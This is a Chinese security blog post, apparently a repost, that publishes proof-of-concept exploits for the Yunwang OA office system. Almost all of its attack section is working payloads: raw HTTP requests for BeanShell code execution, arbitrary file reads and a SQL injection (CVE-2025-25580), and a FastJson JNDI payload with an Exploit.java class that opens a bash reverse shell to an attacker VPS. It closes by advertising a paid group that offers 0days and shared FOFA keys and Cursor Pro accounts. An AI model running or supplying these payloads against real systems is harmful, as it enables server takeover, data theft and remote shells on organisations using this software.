文章总结: 本文披露云网OA系统多个高危漏洞,涵盖BSH代码执行、任意文件读取、FastJsonRCE及SQL注入等,并提供详细POC。文中还提及一处0day文件上传漏洞,但技术细节被保留至付费社群。内容以技术分享为引,实则引流至知识星球进行变现,需谨慎甄别。 综合评分: 55 文章分类: 漏洞分析,漏洞POC,软文广告,WEB安全
【0day】云网OA
原创
SharkSec
SharkSec
2025年12月24日 18:55 湖南
🔔 温馨提示:为了防止走散,不错过每一篇干货内容,请记得将公众号设置为星标!🌟
【声明】本文所有POC仅用于合法安全测试,严禁在未获得明确授权的情况下对任何系统进行测试。擅自测试所引发的一切后果,由操作者自行承担全部法律责任,作者及团队不承担任何连带责任。
引 言
云网OA(又称一米OA)是一款基于Spring Boot + Vue3技术栈构建的企业级低代码协同办公系统,支持MySQL、Oracle等多数据库适配,并可进行本地化私有部署。本文整理了相关Nday POC,文末附0day,仅供安全研究与学习参考。请务必在合法授权范围内进行测试,遵守法律法规。
1
BSH代码执行
POST /admin/script_run.jsp HTTP/1.1Host: Accept: text/plain, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36Origin: http://x.x.x.xReferer: http://x.x.x.xAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: skincode=lte; name=x; JSESSIONID=x; cwbbs.auth=x; pwd=111111Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 47op=1&myscript=exec("ping xxx");
2
任意文件读取
POST /public/netdisk_mapping_downloadfile.jsp HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1Te: trailersConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 48fileName=admin&mappingAddress=C:\Windows\win.ini
POST /public/netdisk_mapping_getfile.jsp HTTP/1.1Host: Cookie: JSESSIONID=1; skincode=lte; name=; pwd=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1Te: trailersConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 48fileName=admin&mappingAddress=C:\Windows\win.ini
3
FastJson RCE
POST /oa//setup/updateUiSetup HTTP/1.1Host:Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: skincode=lte; name=admin; pwd=; JSESSIONID=85F37A117572BE90EA4BA0ED10F77EF5Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 196uiSetup={"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl" }, "b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://xx.xx.xx.xx:xx/Exploit", "autoCommit":true}}
Exploit.java
public class Exploit { public Exploit(){ try { java.lang.Runtime.getRuntime().exec( new String[]{"bash", "-c", "bash -i >& /dev/tcp/VPS地址/12345 0>&1"}); } catch(Exception e){ e.printStackTrace(); } } public static void main(String[] argv){ Exploit e = new Exploit(); }}
4
CVE-2025-25580 SQL注入
POST /oa/user/list HTTP/1.1Host: sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36Cookie: XXXContent-Type: application/x-www-form-urlencoded
sort=)+tmp_count+WHERE+1+=+1+and+updatexml(1,concat(0x7e,user(),0x7e),1)--+-
5
0day–任意文件上传(该漏洞为本地搭建测试,请勿用于非法测试)
关于本次0day的漏洞分析,后续将整理上传至纷传上,感兴趣的师傅,可以直接在纷传中获取。
如果大家对我们的文章技术有什么建议或者工具使用上的反馈,都欢迎大家在评论区留言交流。对我们分享的文章感兴趣,想要深入探讨、交流并学习更多相关内容,也欢迎各位师傅加入官方技术交流群!!!(关注公众号,点击菜单栏:联系我们->技术交流群,添加管理员微信,备注【加群】,拉您进群)
加入圈子,一起进阶!
我们圈子已平稳运营一段时间啦,后续也会持续为大家输送高质量的实战资源:有一线团队的一手攻防经验、私有工具源码(包括咱们公众号发的工具,圈子里能直接拿源码 + 持续迭代),还有漏洞挖掘的 POC/EXP、每月不定期 0day 分享,hw实战攻防遇见高频oa/设备源码都能在这拿到。
对了,圈子里还有些「刚需资源」:FOFA 的 Key 长期能用,Cursor Pro 共享账号登了就能用; 企业 SRC 案例、红队实战经验也会拆解着讲。
现在圈子现价 119 / 人,等满 100 人就涨到 129 了 —— 入了圈子还能进专属内部群,比咱们公开交流群的资源更新更实时、讨论也更深度。
纷传和知识星球内容是同步的,后期主要运营纷传,所以想进圈子的朋友直接扫描下方二维码就可以啦~
结束
👉 点击关注不迷路,一起潜入深水区,突破边界,共同精进!🚀
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:SharkSec SharkSec《【0day】云网OA》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论